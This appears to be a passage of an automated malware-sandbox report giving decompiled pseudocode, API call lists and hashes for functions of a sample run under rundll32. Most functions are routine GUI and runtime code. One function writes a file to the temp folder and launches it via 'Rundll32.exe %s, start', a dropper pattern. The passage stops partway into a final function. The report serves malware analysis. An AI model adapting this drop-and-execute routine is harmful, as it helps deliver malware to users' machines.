                          			E02826B9C(intOrPtr* __eax) {
                          				struct tagMENUITEMINFOA _v128;
                          				intOrPtr _v132;
                          				int _t16;
                          				intOrPtr* _t29;
                          				struct HMENU__* _t36;
                          				MENUITEMINFOA* _t37;
                          
                          				_t37 =  &_v128;
                          				_t29 = __eax;
                          				_t16 =  *0x2864798; // 0x2865748
                          				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                          					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                          					_t37->cbSize = 0x2c;
                          					_v132 = 0x10;
                          					_v128.hbmpUnchecked =  &(_v128.cch);
                          					_v128.dwItemData = 0x50;
                          					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                          					if(_t16 != 0) {
                          						_t16 = E02826F20(_t29);
                          						asm("sbb edx, edx");
                          						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                          							_v128.cbSize = ((E02826F20(_t29) & 0x0000007f) << 0x0000000d) + ((E02826F20(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                          							_v132 = 0x10;
                          							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                          							if(_t16 != 0) {
                          								return DrawMenuBar( *(_t29 + 0x38));
                          							}
                          						}
                          					}
                          				}
                          				return _t16;
                          			}










                          APIs
                          • GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 02826BEA
                          • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 02826C3C
                          • DrawMenuBar.USER32(00000000), ref: 02826C49
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$InfoItem$Draw
                          • String ID: P
                          • API String ID: 3227129158-3110715001
                          • Opcode ID: e19bf649e8ff70b2ad20618ab8f651cbe0c62ab87c91ca4444cb81d4acb2d042
                          • Instruction ID: 750594959d605e0686eee11c98959690be493d67786d1a1e1da83cf981e69585
                          • Opcode Fuzzy Hash: e19bf649e8ff70b2ad20618ab8f651cbe0c62ab87c91ca4444cb81d4acb2d042
                          • Instruction Fuzzy Hash: 2711E7782052205FE320DF28CC84B4B7BD9EF84314F149628F098CB2D8E735C998CB86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E042D3B30(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                          				char _v264;
                          				char _v524;
                          				char _v784;
                          
                          				GetTempPathA(0x104,  &_v524);
                          				GetTempFileNameA( &_v524, "BN", 0,  &_v264);
                          				if(E042D3AC0(_a4,  &_v264, _a4, _a8) != 1) {
                          					return 0;
                          				}
                          				_push(_a8);
                          				if(E042D33C0(_a4) != 1) {
                          					return E042D36C0( &_v264);
                          				}
                          				wsprintfA( &_v784, "Rundll32.exe %s, start",  &_v264);
                          				return E042D36C0( &_v784);
                          			}







                          APIs
                          • GetTempPathA.KERNEL32(00000104,?), ref: 042D3B45
                          • GetTempFileNameA.KERNEL32(?,042D42C0,00000000,?), ref: 042D3B60
                            • Part of subcall function 042D3AC0: CreateFileA.KERNEL32(042D1691,40000000,00000000,00000000,00000002,00000080,00000000,042D1691), ref: 042D3AE6
                            • Part of subcall function 042D3AC0: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 042D3B07
                            • Part of subcall function 042D3AC0: CloseHandle.KERNEL32(000000FF), ref: 042D3B11
                          • wsprintfA.USER32 ref: 042D3BAA
                            • Part of subcall function 042D36C0: CreateProcessA.KERNEL32(00000000,042D3BD2,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 042D36F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateTemp$CloseHandleNamePathProcessWritewsprintf
                          • String ID: Rundll32.exe %s, start
                          • API String ID: 130250823-2967502992
                          • Opcode ID: 9908a90a31e60ff3ba0e1cf195def0224ff21e0d496c6e7f0fe503173bfe6e3d
                          • Instruction ID: dc83107175f978d1df8cca83c6ad6ec6f358c4877ae4701225193006880dfe0b
                          • Opcode Fuzzy Hash: 9908a90a31e60ff3ba0e1cf195def0224ff21e0d496c6e7f0fe503173bfe6e3d
                          • Instruction Fuzzy Hash: 79118CB9B201186BD714DF64FC85FE9737CDB44204F008694FE4A96141E675FB988F92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027DD240() {
                          				_Unknown_base(*)()* _t1;
                          				struct HINSTANCE__* _t3;
                          
                          				_t1 = GetModuleHandleA("kernel32.dll");
                          				_t3 = _t1;
                          				if(_t3 != 0) {
                          					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                          					 *0x2863140 = _t1;
                          				}
                          				if( *0x2863140 == 0) {
                          					 *0x2863140 = E027D8B14;
                          					return E027D8B14;
                          				}
                          				return _t1;
                          			}






                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,027DDCA9,00000000,027DDCBC), ref: 027DD246
                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 027DD257
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                          • API String ID: 1646373207-3712701948
                          • Opcode ID: 52ccfad5f5289f271a0108238b836783ab5791d44243bbe4b439ce1aa30ec661
                          • Instruction ID: ec80c5ecd5d8c63b49b7b72722a181252505fad070e05b4743fa604f715ed702
                          • Opcode Fuzzy Hash: 52ccfad5f5289f271a0108238b836783ab5791d44243bbe4b439ce1aa30ec661
                          • Instruction Fuzzy Hash: FDD0C7F6A80341DBFF319BE5748971776BDA735E45F002A65F04157141D774D4108621
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0281FC98() {
                          				struct HINSTANCE__* _v8;
                          				struct HINSTANCE__* _t4;
                          				_Unknown_base(*)()* _t6;
                          
                          				_t4 = GetModuleHandleA("User32.dll");
                          				_v8 = _t4;
                          				if(_v8 != 0) {
                          					_t6 = GetProcAddress(_v8, "SetLayeredWindowAttributes");
                          					 *0x2863c88 = _t6;
                          					return _t6;
                          				}
                          				return _t4;
                          			}







                          APIs
                          • GetModuleHandleA.KERNEL32(User32.dll), ref: 0281FCA1
                          • GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 0281FCB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: SetLayeredWindowAttributes$User32.dll
                          • API String ID: 1646373207-2510956139
                          • Opcode ID: 844a78c1bdf0562497db25be40bd2f9ebb8335157a2fa7bac51820c01056a3c4
                          • Instruction ID: 32c58d1a3b2b4f3c1ad0ac1a83661f52417d19d557aea33a801fbe550402ad8b
                          • Opcode Fuzzy Hash: 844a78c1bdf0562497db25be40bd2f9ebb8335157a2fa7bac51820c01056a3c4
                          • Instruction Fuzzy Hash: 5BD05EBC944318BAFB00EBE4E50998D77BDD710610F10045AE60497680DA791A40EB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027FEE20() {
                          				struct HINSTANCE__* _t1;
                          				struct HINSTANCE__* _t2;
                          				_Unknown_base(*)()* _t3;
                          
                          				if( *0x2865934 == 0) {
                          					_t1 = GetModuleHandleA("comctl32.dll");
                          					 *0x2865934 = _t1;
                          					if( *0x2865934 != 0) {
                          						_t2 =  *0x2865934; // 0x0
                          						_t3 = GetProcAddress(_t2, "InitCommonControlsEx");
                          						 *0x2865938 = _t3;
                          						return _t3;
                          					}
                          				}
                          				return _t1;
                          			}







                          APIs
                          • GetModuleHandleA.KERNEL32(comctl32.dll,027FEE91,00000200,02808FEE), ref: 027FEE2E
                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 027FEE4C
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: InitCommonControlsEx$comctl32.dll
                          • API String ID: 1646373207-802336580
                          • Opcode ID: 5ee70c4ffcc4653d053ccd8c0ca798d8d0b18e386496f91b20c3b4254169874c
                          • Instruction ID: 61d5ab28c6d96c848c7cdfe96e31941227e4d99a61a926109f4adfbb04fe9db1
                          • Opcode Fuzzy Hash: 5ee70c4ffcc4653d053ccd8c0ca798d8d0b18e386496f91b20c3b4254169874c
                          • Instruction Fuzzy Hash: 87D067B9D87340DBF761AB74B58C72537A59384A26F813814D2459A290E77D0050CF14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E0282B638(intOrPtr* __eax, signed int __edx) {
                          				intOrPtr _v16;
                          				char _v20;
                          				char _v24;
                          				char _v28;
                          				intOrPtr _t49;
                          				intOrPtr _t50;
                          				intOrPtr _t53;
                          				intOrPtr _t54;
                          				intOrPtr _t55;
                          				intOrPtr _t56;
                          				intOrPtr* _t60;
                          				intOrPtr* _t62;
                          				struct HICON__* _t65;
                          				intOrPtr _t67;
                          				intOrPtr* _t72;
                          				intOrPtr _t74;
                          				intOrPtr* _t75;
                          				intOrPtr _t78;
                          				intOrPtr _t80;
                          				intOrPtr _t82;
                          				intOrPtr _t84;
                          				intOrPtr _t85;
                          				struct HWND__* _t88;
                          				intOrPtr _t89;
                          				intOrPtr _t91;
                          				intOrPtr* _t93;
                          				intOrPtr _t97;
                          				intOrPtr _t100;
                          				intOrPtr _t102;
                          				intOrPtr _t103;
                          				intOrPtr _t104;
                          				intOrPtr _t106;
                          				struct HWND__* _t107;
                          				intOrPtr _t108;
                          				intOrPtr _t110;
                          				intOrPtr _t114;
                          				intOrPtr _t117;
                          				char _t118;
                          				intOrPtr _t119;
                          				void* _t131;
                          				intOrPtr _t135;
                          				intOrPtr _t140;
                          				intOrPtr* _t155;
                          				void* _t158;
                          				void* _t165;
                          				void* _t166;
                          
                          				_t155 = __eax;
                          				if( *0x2865bd0 != 0) {
                          					L3:
                          					_t49 =  *0x2865bb0; // 0x0
                          					_t50 =  *0x2865bb0; // 0x0
                          					_t117 = E0282B518(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                          					if( *0x2865bd0 == 0) {
                          						_t168 =  *0x2865bd4;
                          						if( *0x2865bd4 != 0) {
                          							_t106 =  *0x2865bc4; // 0x0
                          							_t107 = GetDesktopWindow();
                          							_t108 =  *0x2865bd4; // 0x0
                          							E0283597C(_t108, _t107, _t168, _t106);
                          						}
                          					}
                          					_t53 =  *0x2865bb0; // 0x0
                          					if( *((char*)(_t53 + 0x9b)) != 0) {
                          						__eflags =  *0x2865bd0;
                          						_t6 =  &_v24;
                          						 *_t6 =  *0x2865bd0 != 0;
                          						__eflags =  *_t6;
                          						 *0x2865bd0 = 2;
                          					} else {
                          						 *0x2865bd0 = 1;
                          						_v24 = 0;
                          					}
                          					_t54 =  *0x2865bb4; // 0x0
                          					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                          						L12:
                          						_t55 =  *0x2865bb4; // 0x0
                          						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                          						_t14 = _t155 + 4; // 0x0
                          						 *((intOrPtr*)(_t55 + 0x10)) =  *_t14;
                          						_t56 =  *0x2865bb4; // 0x0
                          						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                          							_t97 =  *0x2865bb4; // 0x0
                          							E0282D294( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                          							_t100 =  *0x2865bb4; // 0x0
                          							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                          							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                          						}
                          						_t23 = _t155 + 4; // 0x0
                          						_t131 = E0282B568(2);
                          						_t121 =  *_t155;
                          						_t60 =  *0x2865bb4; // 0x0
                          						_t158 =  *((intOrPtr*)( *_t60 + 4))( *_t23);
                          						if( *0x2865bd4 != 0) {
                          							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                          								_t82 =  *0x2865bd4; // 0x0
                          								E02835938(_t82, _t158);
                          								_t84 =  *0x2865bd4; // 0x0
                          								_t177 =  *((char*)(_t84 + 0x6a));
                          								if( *((char*)(_t84 + 0x6a)) != 0) {
                          									_t30 = _t155 + 4; // 0x0
                          									_t121 =  *_t30;
                          									_t85 =  *0x2865bd4; // 0x0
                          									E02835A64(_t85,  *_t30,  *_t155, __eflags);
                          								} else {
                          									_t29 = _t155 + 4; // 0x0
                          									_t88 = GetDesktopWindow();
                          									_t121 =  *_t155;
                          									_t89 =  *0x2865bd4; // 0x0
                          									E0283597C(_t89, _t88, _t177,  *_t29);
                          								}
                          							} else {
                          								_t91 =  *0x2865bd4; // 0x0
                          								E02835AD8(_t91, _t131, __eflags);
                          								_t93 =  *0x2864774; // 0x2865b5c
                          								SetCursor(E0281C0D4( *_t93, _t158));
                          							}
                          						}
                          						_t62 =  *0x2864774; // 0x2865b5c
                          						_t65 = SetCursor(E0281C0D4( *_t62, _t158));
                          						if( *0x2865bd0 != 2) {
                          							L32:
                          							return _t65;
                          						} else {
                          							_t179 = _t117;
                          							if(_t117 != 0) {
                          								_t118 = E0282B5A4(_t121);
                          								_t67 =  *0x2865bb4; // 0x0
                          								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                          								__eflags = _t118;
                          								if(__eflags != 0) {
                          									E0282D294(_t118,  &_v24, _t155);
                          									_t65 = E027D3408(_t118, __eflags);
                          									_t135 =  *0x2865bb4; // 0x0
                          									 *(_t135 + 0x54) = _t65;
                          								} else {
                          									_t78 =  *0x2865bb4; // 0x0
                          									_t65 = E027D3408( *((intOrPtr*)(_t78 + 4)), __eflags);
                          									_t140 =  *0x2865bb4; // 0x0
                          									 *(_t140 + 0x54) = _t65;
                          								}
                          							} else {
                          								_t31 = _t155 + 4; // 0x0
                          								_push( *_t31);
                          								_t80 =  *0x2865bb4; // 0x0
                          								_t65 = E027D3408( *((intOrPtr*)(_t80 + 0x38)), _t179);
                          							}
                          							if( *0x2865bb4 == 0) {
                          								goto L32;
                          							} else {
                          								_t119 =  *0x2865bb4; // 0x0
                          								_t41 = _t119 + 0x5c; // 0x5c
                          								_t42 = _t119 + 0x44; // 0x44
                          								_t65 = E027D8200(_t42, 0x10, _t41);
                          								if(_t65 != 0) {
                          									goto L32;
                          								}
                          								if(_v28 != 0) {
                          									_t75 =  *0x2865bb4; // 0x0
                          									 *((intOrPtr*)( *_t75 + 0x34))();
                          								}
                          								_t72 =  *0x2865bb4; // 0x0
                          								 *((intOrPtr*)( *_t72 + 0x30))();
                          								_t74 =  *0x2865bb4; // 0x0
                          								asm("movsd");
                          								asm("movsd");
                          								asm("movsd");
                          								asm("movsd");
                          								return _t74;
                          							}
                          						}
                          					}
                          					_t65 = E0282B568(1);
                          					if( *0x2865bb4 == 0) {
                          						goto L32;
                          					}
                          					_t102 =  *0x2865bb4; // 0x0
                          					 *((intOrPtr*)(_t102 + 4)) = _t117;
                          					_t103 =  *0x2865bb4; // 0x0
                          					 *((intOrPtr*)(_t103 + 8)) = _v28;
                          					_t104 =  *0x2865bb4; // 0x0
                          					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                          					_t11 = _t155 + 4; // 0x0
                          					 *((intOrPtr*)(_t104 + 0x10)) =  *_t11;
                          					_t65 = E0282B568(0);
                          					if( *0x2865bb4 == 0) {
                          						goto L32;
                          					}
                          					goto L12;
                          				}
                          				_t110 =  *0x2865bc0; // 0x0
                          				asm("cdq");
                          				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x2865bcc; // 0x0
                          				if(_t165 >= 0) {
                          					goto L3;
                          				}
                          				_t114 =  *0x2865bc4; // 0x0
                          				_t1 = _t155 + 4; // 0x0
                          				asm("cdq");
                          				_t65 = (_t114 -  *_t1 ^ __edx) - __edx;
                          				_t166 = _t65 -  *0x2865bcc; // 0x0
                          				if(_t166 < 0) {
                          					goto L32;
                          				}
                          				goto L3;
                          			}


















































                          APIs
                          • GetDesktopWindow.USER32 ref: 0282B6AC
                          • GetDesktopWindow.USER32 ref: 0282B7D1
                          • SetCursor.USER32(00000000), ref: 0282B826
                            • Part of subcall function 02835AD8: 74470910.COMCTL32(00000000,?,0282B801), ref: 02835AF4
                            • Part of subcall function 02835AD8: ShowCursor.USER32(000000FF,00000000,?,0282B801), ref: 02835B0F
                          • SetCursor.USER32(00000000), ref: 0282B811
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Cursor$DesktopWindow$74470910Show
                          • String ID:
                          • API String ID: 2624501786-0
                          • Opcode ID: c7510a5c0f762beb53617aec17765c9d2a473e5b7946832d8c32239620119358
                          • Instruction ID: 1b62631e7c876eaa7e909935adcde8fc1f9898ea5d874dceac4812df3b663c8e
                          • Opcode Fuzzy Hash: c7510a5c0f762beb53617aec17765c9d2a473e5b7946832d8c32239620119358
                          • Instruction Fuzzy Hash: 1A9130BCA422528FC705DF28D288B557BE7BB48308F949994D488CB395DB78EC99CF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0281743C(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				struct HMENU__* _v16;
                          				char _v20;
                          				char _v24;
                          				char _v28;
                          				char _v32;
                          				void* _t88;
                          				intOrPtr _t104;
                          				void* _t106;
                          				void* _t114;
                          				struct HMENU__* _t117;
                          				struct HMENU__* _t124;
                          				intOrPtr _t136;
                          				void* _t138;
                          				intOrPtr _t140;
                          				intOrPtr _t143;
                          				intOrPtr _t148;
                          				intOrPtr _t160;
                          				void* _t171;
                          				void* _t172;
                          				void* _t175;
                          
                          				_t172 = __esi;
                          				_t171 = __edi;
                          				_t152 = __ebx;
                          				_push(__ebx);
                          				_v32 = 0;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_push(_t175);
                          				_push(0x2817660);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t175 + 0xffffffe4;
                          				if(_v12 == 0) {
                          					L7:
                          					if( *((intOrPtr*)(_v8 + 0x248)) != 0) {
                          						_t26 = _v8 + 0x248; // 0x74000478
                          						E02826E08( *_t26, 0, _t171, 0);
                          					}
                          					if(( *(_v8 + 0x1c) & 0x00000008) != 0 || _v12 != 0 && ( *(_v12 + 0x1c) & 0x00000008) != 0) {
                          						_v12 = 0;
                          					}
                          					 *((intOrPtr*)(_v8 + 0x248)) = _v12;
                          					if(_v12 != 0) {
                          						E027F3924(_v12, _v8);
                          					}
                          					if(_v12 == 0 || ( *(_v8 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_v8 + 0x229)) == 3) {
                          						_t88 = E02834254(_v8);
                          						__eflags = _t88;
                          						if(_t88 != 0) {
                          							SetMenu(E02833F7C(_v8), 0);
                          						}
                          						goto L30;
                          					} else {
                          						_t51 = _v8 + 0x248; // 0x74000478
                          						if( *((char*)( *_t51 + 0x5c)) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                          							if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                          								_t104 = _v8;
                          								__eflags =  *((char*)(_t104 + 0x22f)) - 1;
                          								if( *((char*)(_t104 + 0x22f)) != 1) {
                          									_t106 = E02834254(_v8);
                          									__eflags = _t106;
                          									if(_t106 != 0) {
                          										SetMenu(E02833F7C(_v8), 0);
                          									}
                          								}
                          								goto L30;
                          							}
                          							goto L21;
                          						} else {
                          							L21:
                          							if(E02834254(_v8) != 0) {
                          								_t61 = _v8 + 0x248; // 0x74000478
                          								_t114 =  *((intOrPtr*)( *((intOrPtr*)( *_t61)) + 0x34))();
                          								_t117 = GetMenu(E02833F7C(_v8));
                          								_t197 = _t114 - _t117;
                          								if(_t114 != _t117) {
                          									_t65 = _v8 + 0x248; // 0x74000478
                          									_t124 =  *((intOrPtr*)( *((intOrPtr*)( *_t65)) + 0x34))();
                          									SetMenu(E02833F7C(_v8), _t124);
                          								}
                          								E02826E08(_v12, E02833F7C(_v8), _t171, _t197);
                          							}
                          							L30:
                          							if( *((char*)(_v8 + 0x22e)) != 0) {
                          								E02818964(_v8, 1);
                          							}
                          							E02817308(_v8);
                          							_pop(_t160);
                          							 *[fs:eax] = _t160;
                          							_push(0x2817667);
                          							return E027D40E8( &_v32);
                          						}
                          					}
                          				}
                          				_t136 =  *0x2865b5c; // 0x41d1150
                          				_t138 = E0281BA80(_t136) - 1;
                          				if(_t138 >= 0) {
                          					_v20 = _t138 + 1;
                          					_v16 = 0;
                          					do {
                          						_t140 =  *0x2865b5c; // 0x41d1150
                          						if( *((intOrPtr*)(E0281BA5C(_t140, _v16) + 0x248)) == _v12) {
                          							_t143 =  *0x2865b5c; // 0x41d1150
                          							if(E0281BA5C(_t143, _v16) != _v8) {
                          								_v28 =  *((intOrPtr*)(_v12 + 8));
                          								_v24 = 0xb;
                          								_t148 =  *0x28643d0; // 0x27f55d4
                          								E027D6018(_t148,  &_v32);
                          								E027DBC00(_t152, _v32, 1, _t171, _t172, 0,  &_v28);
                          								E027D3A9C();
                          							}
                          						}
                          						_v16 =  &(_v16->i);
                          						_t21 =  &_v20;
                          						 *_t21 = _v20 - 1;
                          					} while ( *_t21 != 0);
                          				}
                          			}


























                          APIs
                          • GetMenu.USER32(00000000), ref: 028175AC
                          • SetMenu.USER32(00000000,00000000), ref: 028175CD
                          • SetMenu.USER32(00000000,00000000), ref: 02817609
                          • SetMenu.USER32(00000000,00000000), ref: 02817627
                            • Part of subcall function 027D6018: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 027D6049
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$LoadString
                          • String ID:
                          • API String ID: 3688185913-0
                          • Opcode ID: 57a992f2cefeb2a4b093dfad6011d3812833c797f5ef7cdec7a08a7127e91373
                          • Instruction ID: 7bf184c5de4d84a1f7957a50badfb642b16e4b0763aab2c8856c9a2cf6d336e9
                          • Opcode Fuzzy Hash: 57a992f2cefeb2a4b093dfad6011d3812833c797f5ef7cdec7a08a7127e91373
                          • Instruction Fuzzy Hash: D061EB7CA04108EFDB51EBA8D589B9DBBFAAF04304F6544E8E408E72A1C774AE45DF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E027DF340(intOrPtr* __eax) {
                          				char _v260;
                          				char _v768;
                          				char _v772;
                          				intOrPtr* _v776;
                          				signed short* _v780;
                          				char _v784;
                          				signed int _v788;
                          				char _v792;
                          				intOrPtr* _v796;
                          				signed char _t43;
                          				intOrPtr* _t60;
                          				void* _t79;
                          				void* _t81;
                          				void* _t84;
                          				void* _t85;
                          				intOrPtr* _t92;
                          				void* _t96;
                          				char* _t97;
                          				void* _t98;
                          
                          				_v776 = __eax;
                          				if(( *(_v776 + 1) & 0x00000020) == 0) {
                          					E027DF188(0x80070057);
                          				}
                          				_t43 =  *_v776;
                          				if((_t43 & 0x00000fff) == 0xc) {
                          					if((_t43 & 0x00000040) == 0) {
                          						_v780 =  *((intOrPtr*)(_v776 + 8));
                          					} else {
                          						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                          					}
                          					_v788 =  *_v780 & 0x0000ffff;
                          					_t79 = _v788 - 1;
                          					if(_t79 >= 0) {
                          						_t85 = _t79 + 1;
                          						_t96 = 0;
                          						_t97 =  &_v772;
                          						do {
                          							_v796 = _t97;
                          							_push(_v796 + 4);
                          							_t22 = _t96 + 1; // 0x1
                          							_push(_v780);
                          							L027DE148();
                          							E027DF188(_v780);
                          							_push( &_v784);
                          							_t25 = _t96 + 1; // 0x1
                          							_push(_v780);
                          							L027DE150();
                          							E027DF188(_v780);
                          							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                          							_t96 = _t96 + 1;
                          							_t97 = _t97 + 8;
                          							_t85 = _t85 - 1;
                          						} while (_t85 != 0);
                          					}
                          					_t81 = _v788 - 1;
                          					if(_t81 >= 0) {
                          						_t84 = _t81 + 1;
                          						_t60 =  &_v768;
                          						_t92 =  &_v260;
                          						do {
                          							 *_t92 =  *_t60;
                          							_t92 = _t92 + 4;
                          							_t60 = _t60 + 8;
                          							_t84 = _t84 - 1;
                          						} while (_t84 != 0);
                          						do {
                          							goto L12;
                          						} while (E027DF2E4(_t83, _t98) != 0);
                          						goto L15;
                          					}
                          					L12:
                          					_t83 = _v788 - 1;
                          					if(E027DF2B4(_v788 - 1, _t98) != 0) {
                          						_push( &_v792);
                          						_push( &_v260);
                          						_push(_v780);
                          						L027DE178();
                          						E027DF188(_v780);
                          						E027DF538(_v792);
                          					}
                          				}
                          				L15:
                          				_push(_v776);
                          				L027DDCDC();
                          				return E027DF188(_v776);
                          			}























                          APIs
                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027DF3EF
                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027DF40B
                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027DF482
                          • VariantClear.OLEAUT32(?), ref: 027DF4AB
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ArraySafe$Bound$ClearIndexVariant
                          • String ID:
                          • API String ID: 920484758-0
                          • Opcode ID: 18b9160fed3113d412c3891d1c0f83ff0f579bb4c4ae3bd89441f87cbbf4b081
                          • Instruction ID: 1585fba4766c2adf79d18f1402f7482eb6a3c9aa8621ddd2fb975ccaafdd1a78
                          • Opcode Fuzzy Hash: 18b9160fed3113d412c3891d1c0f83ff0f579bb4c4ae3bd89441f87cbbf4b081
                          • Instruction Fuzzy Hash: 5C412875A012299FCB62EB58CD94BC9B3BDBF48314F0041D5E64AA7611DA34AF818F52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E042D3580(intOrPtr _a4) {
                          				intOrPtr* _v8;
                          				struct HINSTANCE__* _v12;
                          				void* _v16;
                          				signed int* _v20;
